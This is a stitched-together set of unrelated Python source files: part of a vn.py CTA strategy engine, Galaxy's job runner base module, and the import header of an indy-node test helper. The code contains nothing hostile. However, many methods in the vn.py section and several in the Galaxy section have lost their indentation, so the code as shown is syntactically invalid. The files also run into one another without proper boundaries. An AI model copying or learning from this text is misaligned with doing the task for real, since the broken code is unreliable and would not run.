        strategy.update_setting(setting)

        self.update_strategy_setting(strategy_name, setting)
        self.put_strategy_event(strategy)
def remove_strategy(self, strategy_name: str):
"""
Remove a strategy.
"""
strategy = self.strategies[strategy_name]
if strategy.trading:
self.write_log(f"策略{strategy.strategy_name}移除失败,请先停止")
return
# Remove setting
self.remove_strategy_setting(strategy_name)
# Remove from symbol strategy map
strategies = self.symbol_strategy_map[strategy.vt_symbol]
strategies.remove(strategy)
# Remove from active orderid map
if strategy_name in self.strategy_orderid_map:
vt_orderids = self.strategy_orderid_map.pop(strategy_name)
# Remove vt_orderid strategy map
for vt_orderid in vt_orderids:
if vt_orderid in self.orderid_strategy_map:
self.orderid_strategy_map.pop(vt_orderid)
# Remove from strategies
self.strategies.pop(strategy_name)
return True
    def load_strategy_class(self):
        """
        Load strategy classes from both the app's bundled strategies
        package and a "strategies" folder under the working directory.
        """
        path1 = Path(__file__).parent.joinpath("strategies")
        self.load_strategy_class_from_folder(
            path1, "vnpy.app.cta_strategy.strategies")

        path2 = Path.cwd().joinpath("strategies")
        self.load_strategy_class_from_folder(path2, "strategies")
def load_strategy_class_from_folder(self, path: Path, module_name: str = ""):
"""
Load strategy class from certain folder.
"""
for dirpath, dirnames, filenames in os.walk(str(path)):
for filename in filenames:
if filename.endswith(".py"):
strategy_module_name = ".".join(
[module_name, filename.replace(".py", "")])
self.load_strategy_class_from_module(strategy_module_name)
def load_strategy_class_from_module(self, module_name: str):
"""
Load strategy class from module file.
"""
try:
module = importlib.import_module(module_name)
for name in dir(module):
value = getattr(module, name)
if (isinstance(value, type) and issubclass(value, CtaTemplate) and value is not CtaTemplate):
self.classes[value.__name__] = value
except: # noqa
msg = f"策略文件{module_name}加载失败,触发异常:\n{traceback.format_exc()}"
self.write_log(msg)
    def load_strategy_data(self):
        """
        Load strategy data (persisted runtime variables) from json file.
        """
        self.strategy_data = load_json(self.data_filename)
def sync_strategy_data(self, strategy: CtaTemplate):
"""
Sync strategy data into json file.
"""
data = strategy.get_variables()
data.pop("inited") # Strategy status (inited, trading) should not be synced.
data.pop("trading")
self.strategy_data[strategy.strategy_name] = data
save_json(self.data_filename, self.strategy_data)
def get_all_strategy_class_names(self):
"""
Return names of strategy classes loaded.
"""
return list(self.classes.keys())
def get_strategy_class_parameters(self, class_name: str):
"""
Get default parameters of a strategy class.
"""
strategy_class = self.classes[class_name]
parameters = {}
for name in strategy_class.parameters:
parameters[name] = getattr(strategy_class, name)
return parameters
def get_strategy_parameters(self, strategy_name):
"""
Get parameters of a strategy.
"""
strategy = self.strategies[strategy_name]
return strategy.get_parameters()
def init_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.init_strategy(strategy_name)
def start_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.start_strategy(strategy_name)
def stop_all_strategies(self):
"""
"""
for strategy_name in self.strategies.keys():
self.stop_strategy(strategy_name)
    def load_strategy_setting(self):
        """
        Load setting file and recreate every configured strategy.
        """
        self.strategy_setting = load_json(self.setting_filename)

        for strategy_name, strategy_config in self.strategy_setting.items():
            self.add_strategy(
                strategy_config["class_name"],
                strategy_name,
                strategy_config["vt_symbol"],
                strategy_config["setting"]
            )
    def update_strategy_setting(self, strategy_name: str, setting: dict):
        """
        Update setting file with the strategy's class, symbol and settings.
        """
        strategy = self.strategies[strategy_name]

        self.strategy_setting[strategy_name] = {
            "class_name": strategy.__class__.__name__,
            "vt_symbol": strategy.vt_symbol,
            "setting": setting,
        }
        save_json(self.setting_filename, self.strategy_setting)
def remove_strategy_setting(self, strategy_name: str):
"""
Update setting file.
"""
if strategy_name not in self.strategy_setting:
return
self.strategy_setting.pop(strategy_name)
save_json(self.setting_filename, self.strategy_setting)
def put_stop_order_event(self, stop_order: StopOrder):
"""
Put an event to update stop order status.
"""
event = Event(EVENT_CTA_STOPORDER, stop_order)
self.event_engine.put(event)
def put_strategy_event(self, strategy: CtaTemplate):
"""
Put an event to update strategy status.
"""
data = strategy.get_data()
event = Event(EVENT_CTA_STRATEGY, data)
self.event_engine.put(event)
    def write_log(self, msg: str, strategy: CtaTemplate = None):
        """
        Create cta engine log event; when *strategy* is given the message
        is prefixed with its name.
        """
        if strategy:
            msg = f"{strategy.strategy_name}: {msg}"

        log = LogData(msg=msg, gateway_name="CtaStrategy")
        event = Event(type=EVENT_CTA_LOG, data=log)
        self.event_engine.put(event)
def send_email(self, msg: str, strategy: CtaTemplate = None):
"""
Send email to default receiver.
"""
if strategy:
subject = f"{strategy.strategy_name}"
else:
subject = "CTA策略引擎"
self.main_engine.send_email(subject, msg)
|
__init__.py | """
Base classes for job runner plugins.
"""
import os
import time
import string
import logging
import datetime
import threading
import subprocess
from Queue import Queue, Empty
import galaxy.jobs
from galaxy.jobs.command_factory import build_command
from galaxy import model
from galaxy.util import DATABASE_MAX_STRING_SIZE, shrink_stream_by_size
from galaxy.util import in_directory
from galaxy.util import ParamsWithSpecs
from galaxy.util import ExecutionTimer
from galaxy.util.bunch import Bunch
from galaxy.jobs.runners.util.job_script import write_script
from galaxy.jobs.runners.util.job_script import job_script
from galaxy.jobs.runners.util.env import env_to_statement
from .state_handler_factory import build_state_handlers
log = logging.getLogger( __name__ )

# Sentinel placed on the work queue to tell worker threads to exit.
STOP_SIGNAL = object()

# Error message templates used by RunnerParams below.
JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE = "Invalid job runner parameter for this plugin: %s"
JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE = "Job runner parameter '%s' value '%s' could not be converted to the correct type"
JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE = "Job runner parameter %s failed validation"

# Shell fragments prepended to job scripts: adjust PYTHONPATH and activate
# Galaxy's virtualenv on the execution host (no-ops when set to "None").
GALAXY_LIB_ADJUST_TEMPLATE = """GALAXY_LIB="%s"; if [ "$GALAXY_LIB" != "None" ]; then if [ -n "$PYTHONPATH" ]; then PYTHONPATH="$GALAXY_LIB:$PYTHONPATH"; else PYTHONPATH="$GALAXY_LIB"; fi; export PYTHONPATH; fi;"""
GALAXY_VENV_TEMPLATE = """GALAXY_VIRTUAL_ENV="%s"; if [ "$GALAXY_VIRTUAL_ENV" != "None" -a -z "$VIRTUAL_ENV" -a -f "$GALAXY_VIRTUAL_ENV/bin/activate" ]; then . "$GALAXY_VIRTUAL_ENV/bin/activate"; fi;"""
class RunnerParams( ParamsWithSpecs ):
    """Validated job-runner parameter bag; raises on unknown or invalid
    parameters via the hooks below."""

    def _param_unknown_error( self, name ):
        raise Exception( JOB_RUNNER_PARAMETER_UNKNOWN_MESSAGE % name )

    def _param_map_error( self, name, value ):
        raise Exception( JOB_RUNNER_PARAMETER_MAP_PROBLEM_MESSAGE % ( name, value ) )

    # NOTE(review): "vaildation" is misspelled, but this is presumably the
    # hook name ParamsWithSpecs calls -- confirm before renaming.
    def _param_vaildation_error( self, name, value ):
        raise Exception( JOB_RUNNER_PARAMETER_VALIDATION_FAILED_MESSAGE % name )
class BaseJobRunner( object ):
    """Common machinery for job runner plugins: a work queue drained by
    worker threads, parameter validation and job preparation helpers."""

    DEFAULT_SPECS = dict( recheck_missing_job_retries=dict( map=int, valid=lambda x: x >= 0, default=0 ) )

    def __init__( self, app, nworkers, **kwargs ):
        """Start the job runner.

        ``kwargs`` are plugin parameters validated against DEFAULT_SPECS
        merged with any plugin-supplied ``runner_param_specs``.
        """
        self.app = app
        self.sa_session = app.model.context
        self.nworkers = nworkers
        runner_param_specs = self.DEFAULT_SPECS.copy()
        if 'runner_param_specs' in kwargs:
            runner_param_specs.update( kwargs.pop( 'runner_param_specs' ) )
        if kwargs:
            log.debug( 'Loading %s with params: %s', self.runner_name, kwargs )
        self.runner_params = RunnerParams( specs=runner_param_specs, params=kwargs )
        self.runner_state_handlers = build_state_handlers()
    def _init_worker_threads(self):
        """Start ``nworkers`` daemon worker threads, each running run_next().
        """
        self.work_queue = Queue()
        self.work_threads = []
        log.debug('Starting %s %s workers' % (self.nworkers, self.runner_name))
        for i in range(self.nworkers):
            worker = threading.Thread( name="%s.work_thread-%d" % (self.runner_name, i), target=self.run_next )
            # Daemon threads so a hung worker cannot block interpreter exit.
            worker.setDaemon( True )
            worker.start()
            self.work_threads.append( worker )
def run_next(self):
"""Run the next item in the work queue (a job waiting to run)
"""
while True:
( method, arg ) = self.work_queue.get()
if method is STOP_SIGNAL:
return
# id and name are collected first so that the call of method() is the last exception.
try:
if isinstance(arg, AsynchronousJobState):
job_id = arg.job_wrapper.get_id_tag()
else:
# arg should be a JobWrapper/TaskWrapper
job_id = arg.get_id_tag()
except:
job_id = 'unknown'
try:
name = method.__name__
except:
name = 'unknown'
try:
method(arg)
except:
log.exception( "(%s) Unhandled exception calling %s" % ( job_id, name ) )
    def put(self, job_wrapper):
        """Add a job to the queue (by job identifier), indicate that the job is ready to run.

        Marks the job QUEUED and persists its destination before handing
        it to a worker thread, so it cannot be picked up twice.
        """
        put_timer = ExecutionTimer()
        job = job_wrapper.get_job()
        # Change to queued state before handing to worker thread so the runner won't pick it up again
        job_wrapper.change_state( model.Job.states.QUEUED, flush=False, job=job )
        # Persist the destination so that the job will be included in counts if using concurrency limits
        job_wrapper.set_job_destination( job_wrapper.job_destination, None, flush=False, job=job )
        self.sa_session.flush()
        self.mark_as_queued(job_wrapper)
        log.debug("Job [%s] queued %s" % (job_wrapper.job_id, put_timer))
    def mark_as_queued(self, job_wrapper):
        # Causes the runner's `queue_job` method to be called from a worker thread.
        self.work_queue.put( ( self.queue_job, job_wrapper ) )
def shutdown( self ):
"""Attempts to gracefully shut down the worker threads
"""
log.info( "%s: Sending stop signal to %s worker threads" % ( self.runner_name, len( self.work_threads ) ) )
for i in range( len( self.work_threads ) ):
self.work_queue.put( ( STOP_SIGNAL, None ) )
    # Most runners should override the legacy URL handler methods and destination param method
    def url_to_destination(self, url):
        """
        Convert a legacy URL to a JobDestination.

        Job runner URLs are deprecated, JobDestinations should be used instead.

        This base class method converts from a URL to a very basic
        JobDestination without destination params.
        """
        return galaxy.jobs.JobDestination(runner=url.split(':')[0])
    def parse_destination_params(self, params):
        """Parse the JobDestination ``params`` dict and return the runner's native representation of those params.

        Abstract: concrete runners must override.
        """
        raise NotImplementedError()
    def prepare_job(self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
                    modify_command_for_container=True):
        """Some sanity checks that all runners' queue_job() methods are likely to want to do.

        Returns True when the job is ready to submit; False when it was
        deleted, is in an unexpected state, failed preparation, or has an
        empty command line (finished immediately).
        """
        job_id = job_wrapper.get_id_tag()
        job_state = job_wrapper.get_state()
        job_wrapper.is_ready = False
        job_wrapper.runner_command_line = None

        # Make sure the job hasn't been deleted
        if job_state == model.Job.states.DELETED:
            log.debug( "(%s) Job deleted by user before it entered the %s queue" % ( job_id, self.runner_name ) )
            if self.app.config.cleanup_job in ( "always", "onsuccess" ):
                job_wrapper.cleanup()
            return False
        elif job_state != model.Job.states.QUEUED:
            log.info( "(%s) Job is in state %s, skipping execution" % ( job_id, job_state ) )
            # cleanup may not be safe in all states
            return False

        # Prepare the job
        try:
            job_wrapper.prepare()
            job_wrapper.runner_command_line = self.build_command_line(
                job_wrapper,
                include_metadata=include_metadata,
                include_work_dir_outputs=include_work_dir_outputs,
                modify_command_for_container=modify_command_for_container
            )
        except Exception as e:
            log.exception("(%s) Failure preparing job" % job_id)
            job_wrapper.fail( e.message if hasattr( e, 'message' ) else "Job preparation failed", exception=True )
            return False

        if not job_wrapper.runner_command_line:
            job_wrapper.finish( '', '' )
            return False

        return True
    # Runners must override the job handling methods
    def queue_job(self, job_wrapper):
        """Submit the prepared job for execution. Abstract."""
        raise NotImplementedError()

    def stop_job(self, job):
        """Terminate a running/queued job. Abstract."""
        raise NotImplementedError()

    def recover(self, job, job_wrapper):
        """Re-attach to a job left running across a server restart. Abstract."""
        raise NotImplementedError()
    def build_command_line( self, job_wrapper, include_metadata=False, include_work_dir_outputs=True,
                            modify_command_for_container=True ):
        """Build the shell command line for the job, resolving a container
        first when the job requires/allows one."""
        container = self._find_container( job_wrapper )
        if not container and job_wrapper.requires_containerization:
            raise Exception("Failed to find a container when required, contact Galaxy admin.")
        return build_command(
            self,
            job_wrapper,
            include_metadata=include_metadata,
            include_work_dir_outputs=include_work_dir_outputs,
            modify_command_for_container=modify_command_for_container,
            container=container
        )
    def get_work_dir_outputs( self, job_wrapper, job_working_directory=None, tool_working_directory=None ):
        """
        Returns list of pairs (source_file, destination) describing path
        to work_dir output file and ultimate destination.

        Sources outside the tool working directory are treated as a
        security violation and skipped (logged, not raised).
        """
        if tool_working_directory is not None and job_working_directory is not None:
            raise Exception("get_work_dir_outputs called with both a job and tool working directory, only one may be specified")

        if tool_working_directory is None:
            if not job_working_directory:
                job_working_directory = os.path.abspath( job_wrapper.working_directory )
            tool_working_directory = os.path.join(job_working_directory, "working")

        # Set up dict of dataset id --> output path; output path can be real or
        # false depending on outputs_to_working_directory
        output_paths = {}
        for dataset_path in job_wrapper.get_output_fnames():
            path = dataset_path.real_path
            if self.app.config.outputs_to_working_directory:
                path = dataset_path.false_path
            output_paths[ dataset_path.dataset_id ] = path

        output_pairs = []
        # Walk job's output associations to find and use from_work_dir attributes.
        job = job_wrapper.get_job()
        job_tool = job_wrapper.tool
        for (joda, dataset) in self._walk_dataset_outputs( job ):
            if joda and job_tool:
                hda_tool_output = job_tool.find_output_def( joda.name )
                if hda_tool_output and hda_tool_output.from_work_dir:
                    # Copy from working dir to HDA.
                    # TODO: move instead of copy to save time?
                    source_file = os.path.join( tool_working_directory, hda_tool_output.from_work_dir )
                    destination = job_wrapper.get_output_destination( output_paths[ dataset.dataset_id ] )
                    if in_directory( source_file, tool_working_directory ):
                        output_pairs.append( ( source_file, destination ) )
                    else:
                        # Security violation.
                        log.exception( "from_work_dir specified a location not in the working directory: %s, %s" % ( source_file, job_wrapper.working_directory ) )
        return output_pairs
    def _walk_dataset_outputs( self, job ):
        """Yield (JobToOutputDatasetAssociation, dataset) pairs for every
        history-associated output dataset of *job*."""
        for dataset_assoc in job.output_datasets + job.output_library_datasets:
            for dataset in dataset_assoc.dataset.dataset.history_associations + dataset_assoc.dataset.dataset.library_associations:
                if isinstance( dataset, self.app.model.HistoryDatasetAssociation ):
                    joda = self.sa_session.query( self.app.model.JobToOutputDatasetAssociation ).filter_by( job=job, dataset=dataset ).first()
                    yield (joda, dataset)
        # TODO: why is this not just something easy like:
        # for dataset_assoc in job.output_datasets + job.output_library_datasets:
        #     yield (dataset_assoc, dataset_assoc.dataset)
        # I don't understand the reworking it backwards. -John
    def _handle_metadata_externally( self, job_wrapper, resolve_requirements=False ):
        """
        Set metadata externally. Used by the Pulsar job runner where this
        shouldn't be attached to command line to execute.

        Runs the metadata-setting script as a subprocess (own process
        group) and blocks until it finishes.
        """
        # run the metadata setting script here
        # this is terminate-able when output dataset/job is deleted
        # so that long running set_meta()s can be canceled without having to reboot the server
        if job_wrapper.get_state() not in [ model.Job.states.ERROR, model.Job.states.DELETED ] and job_wrapper.output_paths:
            lib_adjust = GALAXY_LIB_ADJUST_TEMPLATE % job_wrapper.galaxy_lib_dir
            venv = GALAXY_VENV_TEMPLATE % job_wrapper.galaxy_virtual_env
            external_metadata_script = job_wrapper.setup_external_metadata( output_fnames=job_wrapper.get_output_fnames(),
                                                                            set_extension=True,
                                                                            tmp_dir=job_wrapper.working_directory,
                                                                            # We don't want to overwrite metadata that was copied over in init_meta(), as per established behavior
                                                                            kwds={ 'overwrite' : False } )
            external_metadata_script = "%s %s %s" % (lib_adjust, venv, external_metadata_script)
            if resolve_requirements:
                dependency_shell_commands = self.app.datatypes_registry.set_external_metadata_tool.build_dependency_shell_commands(job_directory=job_wrapper.working_directory)
                if dependency_shell_commands:
                    if isinstance( dependency_shell_commands, list ):
                        dependency_shell_commands = "&&".join( dependency_shell_commands )
                    external_metadata_script = "%s&&%s" % ( dependency_shell_commands, external_metadata_script )
            log.debug( 'executing external set_meta script for job %d: %s' % ( job_wrapper.job_id, external_metadata_script ) )
            # setpgrp puts the child in its own process group so it can be
            # terminated independently of this server process.
            external_metadata_proc = subprocess.Popen( args=external_metadata_script,
                                                       shell=True,
                                                       cwd=job_wrapper.working_directory,
                                                       env=os.environ,
                                                       preexec_fn=os.setpgrp )
            job_wrapper.external_output_metadata.set_job_runner_external_pid( external_metadata_proc.pid, self.sa_session )
            external_metadata_proc.wait()
            log.debug( 'execution of external set_meta for job %d finished' % job_wrapper.job_id )
    def get_job_file(self, job_wrapper, **kwds):
        """Assemble and return the full job script text for *job_wrapper*,
        combining env setup, instrumentation and the runner command line."""
        job_metrics = job_wrapper.app.job_metrics
        job_instrumenter = job_metrics.job_instrumenters[ job_wrapper.job_destination.id ]
        env_setup_commands = kwds.get( 'env_setup_commands', [] )
        env_setup_commands.append( job_wrapper.get_env_setup_clause() or '' )
        destination = job_wrapper.job_destination or {}
        envs = destination.get( "env", [] )
        envs.extend( job_wrapper.environment_variables )
        for env in envs:
            env_setup_commands.append( env_to_statement( env ) )
        command_line = job_wrapper.runner_command_line
        options = dict(
            job_instrumenter=job_instrumenter,
            galaxy_lib=job_wrapper.galaxy_lib_dir,
            galaxy_virtual_env=job_wrapper.galaxy_virtual_env,
            env_setup_commands=env_setup_commands,
            working_directory=os.path.abspath( job_wrapper.working_directory ),
            command=command_line,
            shell=job_wrapper.shell,
            preserve_python_environment=job_wrapper.tool.requires_galaxy_python_environment,
        )
        # Additional logging to enable if debugging from_work_dir handling, metadata
        # commands, etc... (or just peek in the job script.)
        job_id = job_wrapper.job_id
        log.debug( '(%s) command is: %s' % ( job_id, command_line ) )
        options.update(**kwds)
        return job_script(**options)
    def write_executable_script( self, path, contents, mode=0o755 ):
        """Write *contents* to *path* and make it executable (mode 0755)."""
        write_script( path, contents, self.app.config, mode=mode )
    def _find_container(
        self,
        job_wrapper,
        compute_working_directory=None,
        compute_tool_directory=None,
        compute_job_directory=None,
    ):
        """Resolve a container for the job via the app's container finder.

        Compute-side paths default to the local (Galaxy) job directories;
        passing them explicitly marks the job as remote ("pulsar").
        """
        job_directory_type = "galaxy" if compute_working_directory is None else "pulsar"
        if not compute_working_directory:
            compute_working_directory = job_wrapper.tool_working_directory

        if not compute_job_directory:
            compute_job_directory = job_wrapper.working_directory

        if not compute_tool_directory:
            compute_tool_directory = job_wrapper.tool.tool_dir

        tool = job_wrapper.tool
        # Local import (original placement) -- presumably avoids a circular
        # import at module load time; confirm before hoisting to top level.
        from galaxy.tools.deps import containers
        tool_info = containers.ToolInfo(tool.containers, tool.requirements)
        job_info = containers.JobInfo(
            compute_working_directory,
            compute_tool_directory,
            compute_job_directory,
            job_directory_type,
        )

        destination_info = job_wrapper.job_destination.params
        return self.app.container_finder.find_container(
            tool_info,
            destination_info,
            job_info
        )
def _handle_runner_state( self, runner_state, job_state ):
try:
for handler in self.runner_state_handlers.get(runner_state, []):
handler(self.app, self, job_state)
if job_state.runner_state_handled:
break
except:
log.exception('Caught exception in runner state handler:')
def fail_job( self, job_state, exception=False ):
    """Mark the job behind ``job_state`` as failed, stopping it first unless
    ``job_state.stop_job`` is False.

    Registered 'failure' state handlers run first; only if none claim the
    state is the job wrapper itself failed with ``job_state.fail_message``.
    """
    if getattr( job_state, 'stop_job', True ):
        self.stop_job( self.sa_session.query( self.app.model.Job ).get( job_state.job_wrapper.job_id ) )
    self._handle_runner_state( 'failure', job_state )
    # Not convinced this is the best way to indicate this state, but
    # something necessary
    if not job_state.runner_state_handled:
        job_state.job_wrapper.fail( getattr( job_state, 'fail_message', 'Job failed' ), exception=exception )
        if job_state.job_wrapper.cleanup_job == "always":
            job_state.cleanup()
def mark_as_resubmitted( self, job_state, info=None ):
    """Flag the job as resubmitted; with in-memory job tracking, requeue it
    on the handler dispatcher ourselves."""
    job_state.job_wrapper.mark_as_resubmitted( info=info )
    if not self.app.config.track_jobs_in_database:
        job_state.job_wrapper.change_state( model.Job.states.QUEUED )
        self.app.job_manager.job_handler.dispatcher.put( job_state.job_wrapper )
class JobState( object ):
    """
    Encapsulate state of jobs.
    """
    # Symbolic runner failure states consumed by runner state handlers.
    runner_states = Bunch(
        WALLTIME_REACHED='walltime_reached',
        MEMORY_LIMIT_REACHED='memory_limit_reached',
        UNKNOWN_ERROR='unknown_error',
        GLOBAL_WALLTIME_REACHED='global_walltime_reached',
        OUTPUT_SIZE_LIMIT='output_size_limit'
    )

    def __init__( self, job_wrapper, job_destination ):
        self.runner_state_handled = False
        self.job_wrapper = job_wrapper
        self.job_destination = job_destination

    def set_defaults( self, files_dir ):
        """Fill in default job/output/error/exit-code file paths under
        ``files_dir`` and compute a scheduler-safe job name."""
        if self.job_wrapper is not None:
            id_tag = self.job_wrapper.get_id_tag()
            if files_dir is not None:
                self.job_file = JobState.default_job_file( files_dir, id_tag )
                self.output_file = os.path.join( files_dir, 'galaxy_%s.o' % id_tag )
                self.error_file = os.path.join( files_dir, 'galaxy_%s.e' % id_tag )
                self.exit_code_file = os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
            job_name = 'g%s' % id_tag
            if self.job_wrapper.tool.old_id:
                job_name += '_%s' % self.job_wrapper.tool.old_id
            if self.job_wrapper.user:
                job_name += '_%s' % self.job_wrapper.user
            # Replace anything outside [A-Za-z0-9_] so DRMs accept the name.
            # Was ``string.letters``, which exists only on Python 2 and is
            # locale-dependent; ``string.ascii_letters`` works on both.
            self.job_name = ''.join( map( lambda x: x if x in ( string.ascii_letters + string.digits + '_' ) else '_', job_name ) )

    @staticmethod
    def default_job_file( files_dir, id_tag ):
        """Return the conventional path of the job script for ``id_tag``."""
        return os.path.join( files_dir, 'galaxy_%s.sh' % id_tag )

    @staticmethod
    def default_exit_code_file( files_dir, id_tag ):
        """Return the conventional path of the exit-code file for ``id_tag``."""
        return os.path.join( files_dir, 'galaxy_%s.ec' % id_tag )
class AsynchronousJobState( JobState ):
    """
    Encapsulate the state of an asynchronous job, this should be subclassed as
    needed for various job runners to capture additional information needed
    to communicate with distributed resource manager.
    """

    def __init__( self, files_dir=None, job_wrapper=None, job_id=None, job_file=None, output_file=None, error_file=None, exit_code_file=None, job_name=None, job_destination=None ):
        super( AsynchronousJobState, self ).__init__( job_wrapper, job_destination )
        self.old_state = None
        self._running = False
        self.check_count = 0
        self.start_time = None
        # job_id is the DRM's job id, not the Galaxy job id
        self.job_id = job_id
        self.job_file = job_file
        self.output_file = output_file
        self.error_file = error_file
        self.exit_code_file = exit_code_file
        self.job_name = job_name
        # Fill in any file paths / job name not supplied explicitly above.
        self.set_defaults( files_dir )
        # Attributes whose files cleanup() removes; subclasses may extend via
        # register_cleanup_file_attribute().
        self.cleanup_file_attributes = [ 'job_file', 'output_file', 'error_file', 'exit_code_file' ]

    @property
    def running( self ):
        return self._running

    @running.setter
    def running( self, is_running ):
        # First transition to running also stamps start_time.
        self._running = is_running
        # This will be invalid for job recovery
        if self.start_time is None:
            self.start_time = datetime.datetime.now()

    def check_limits( self, runtime=None ):
        """Check the job against its configured runtime limits, but only on
        every 20th call while running (to amortize the cost).

        Returns True and primes runner_state / fail_message / stop_job when a
        limit was exceeded; False otherwise.
        """
        limit_state = None
        if self.job_wrapper.has_limits():
            self.check_count += 1
            if self.running and (self.check_count % 20 == 0):
                if runtime is None:
                    runtime = datetime.datetime.now() - (self.start_time or datetime.datetime.now())
                self.check_count = 0
                limit_state = self.job_wrapper.check_limits( runtime=runtime )
        if limit_state is not None:
            # Set up the job for failure, but the runner will do the actual work
            self.runner_state, self.fail_message = limit_state
            self.stop_job = True
            return True
        return False

    def cleanup( self ):
        """Remove this job's temporary files, logging (not raising) failures."""
        for file in [ getattr( self, a ) for a in self.cleanup_file_attributes if hasattr( self, a ) ]:
            try:
                os.unlink( file )
            except Exception as e:
                log.debug( "(%s/%s) Unable to cleanup %s: %s" % ( self.job_wrapper.get_id_tag(), self.job_id, file, str( e ) ) )

    def register_cleanup_file_attribute( self, attribute ):
        """Add ``attribute`` to the set of file attributes removed by cleanup()."""
        if attribute not in self.cleanup_file_attributes:
            self.cleanup_file_attributes.append( attribute )
class AsynchronousJobRunner( BaseJobRunner ):
    """Parent class for any job runner that runs jobs asynchronously (e.g. via
    a distributed resource manager). Provides general methods for having a
    thread to monitor the state of asynchronous jobs and submitting those jobs
    to the correct methods (queue, finish, cleanup) at appropriate times..
    """

    def __init__( self, app, nworkers, **kwargs ):
        super( AsynchronousJobRunner, self ).__init__( app, nworkers, **kwargs )
        # 'watched' and 'queue' are both used to keep track of jobs to watch.
        # 'queue' is used to add new watched jobs, and can be called from
        # any thread (usually by the 'queue_job' method). 'watched' must only
        # be modified by the monitor thread, which will move items from 'queue'
        # to 'watched' and then manage the watched jobs.
        self.watched = []
        self.monitor_queue = Queue()

    def _init_monitor_thread(self):
        # Daemon thread so it cannot keep the process alive at shutdown.
        self.monitor_thread = threading.Thread( name="%s.monitor_thread" % self.runner_name, target=self.monitor )
        self.monitor_thread.setDaemon( True )
        self.monitor_thread.start()

    def handle_stop(self):
        # DRMAA and SGE runners should override this and disconnect.
        pass

    def monitor( self ):
        """
        Watches jobs currently in the monitor queue and deals with state
        changes (queued to running) and job completion.
        """
        while True:
            # Take any new watched jobs and put them on the monitor list
            try:
                while True:
                    async_job_state = self.monitor_queue.get_nowait()
                    if async_job_state is STOP_SIGNAL:
                        # TODO: This is where any cleanup would occur
                        self.handle_stop()
                        return
                    self.watched.append( async_job_state )
            except Empty:
                pass
            # Iterate over the list of watched jobs and check state
            try:
                self.check_watched_items()
            except Exception:
                log.exception('Unhandled exception checking active jobs')
            # Sleep a bit before the next state check
            time.sleep( 1 )

    def monitor_job(self, job_state):
        # Thread-safe handoff of a new job to the monitor loop.
        self.monitor_queue.put( job_state )

    def shutdown( self ):
        """Attempts to gracefully shut down the monitor thread"""
        log.info( "%s: Sending stop signal to monitor thread" % self.runner_name )
        self.monitor_queue.put( STOP_SIGNAL )
        # Call the parent's shutdown method to stop workers
        super( AsynchronousJobRunner, self ).shutdown()

    def check_watched_items(self):
        """
        This method is responsible for iterating over self.watched and handling
        state changes and updating self.watched with a new list of watched job
        states. Subclasses can opt to override this directly (as older job runners will
        initially) or just override check_watched_item and allow the list processing to
        reuse the logic here.
        """
        new_watched = []
        for async_job_state in self.watched:
            # check_watched_item returns the state to keep watching, or a
            # falsy value to drop the job from the watch list.
            new_async_job_state = self.check_watched_item(async_job_state)
            if new_async_job_state:
                new_watched.append(new_async_job_state)
        self.watched = new_watched

    # Subclasses should implement this unless they override check_watched_items all together.
    def check_watched_item(self, job_state):
        raise NotImplementedError()

    def finish_job( self, job_state ):
        """
        Get the output/error for a finished job, pass to `job_wrapper.finish`
        and cleanup all the job's temporary files.
        """
        galaxy_id_tag = job_state.job_wrapper.get_id_tag()
        external_job_id = job_state.job_id
        # To ensure that files below are readable, ownership must be reclaimed first
        job_state.job_wrapper.reclaim_ownership()
        # wait for the files to appear
        which_try = 0
        while which_try < (self.app.config.retry_job_output_collection + 1):
            try:
                stdout = shrink_stream_by_size( open( job_state.output_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
                stderr = shrink_stream_by_size( open( job_state.error_file, "r" ), DATABASE_MAX_STRING_SIZE, join_by="\n..\n", left_larger=True, beginning_on_size_error=True )
                # Success: force the retry loop to exit.
                which_try = (self.app.config.retry_job_output_collection + 1)
            except Exception as e:
                if which_try == self.app.config.retry_job_output_collection:
                    # Out of retries; record placeholder output and move on.
                    stdout = ''
                    stderr = 'Job output not returned from cluster'
                    log.error( '(%s/%s) %s: %s' % ( galaxy_id_tag, external_job_id, stderr, str( e ) ) )
                else:
                    time.sleep(1)
                which_try += 1
        try:
            # This should be an 8-bit exit code, but read ahead anyway:
            exit_code_str = open( job_state.exit_code_file, "r" ).read(32)
        except:
            # By default, the exit code is 0, which typically indicates success.
            exit_code_str = "0"
        try:
            # Decode the exit code. If it's bogus, then just use 0.
            exit_code = int(exit_code_str)
        except:
            log.warning( "(%s/%s) Exit code '%s' invalid. Using 0." % ( galaxy_id_tag, external_job_id, exit_code_str ) )
            exit_code = 0
        # clean up the job files
        cleanup_job = job_state.job_wrapper.cleanup_job
        if cleanup_job == "always" or ( not stderr and cleanup_job == "onsuccess" ):
            job_state.cleanup()
        try:
            job_state.job_wrapper.finish( stdout, stderr, exit_code )
        except:
            log.exception( "(%s/%s) Job wrapper finish method failed" % ( galaxy_id_tag, external_job_id ) )
            job_state.job_wrapper.fail( "Unable to finish job", exception=True )

    def mark_as_finished(self, job_state):
        # Hand off to a worker thread so the monitor loop is not blocked.
        self.work_queue.put( ( self.finish_job, job_state ) )

    def mark_as_failed(self, job_state):
        self.work_queue.put( ( self.fail_job, job_state ) )
|
helper.py | import functools
import json
import multiprocessing
import os
import socket
import subprocess
from datetime import datetime
from typing import List, Tuple
import base58
import dateutil.tz
from plenum.bls.bls_crypto_factory import create_default_bls_crypto_factory
from plenum.test.node_catchup.helper import waitNodeDataEquality, ensure_all_nodes_have_same_data
from plenum.common.keygen_utils import init_bls_keys
from indy.ledger import build_pool_upgrade_request
from plenum.common.constants import DATA, VERSION, FORCE
from plenum.common.txn_util import get_type, get_payload_data, get_from
from plenum.common.util import randomString, hexToFriendly
from plenum.test import waits as plenumWaits
from plenum.test.helper import sdk_get_and_check_replies
from plenum.test.pool_transactions.helper import sdk_sign_and_send_prepared_request, sdk_send_update_node, \
sdk_pool_refresh, sdk_add_new_nym
from stp_core.common.log import getlogger
from stp_core.loop.eventually import eventually
from indy_common.constants import NODE_UPGRADE, ACTION, \
UPGRADE_MESSAGE, MESSAGE_TYPE, APP_NAME
from indy_common.config import controlServiceHost, controlServicePort
import indy_node
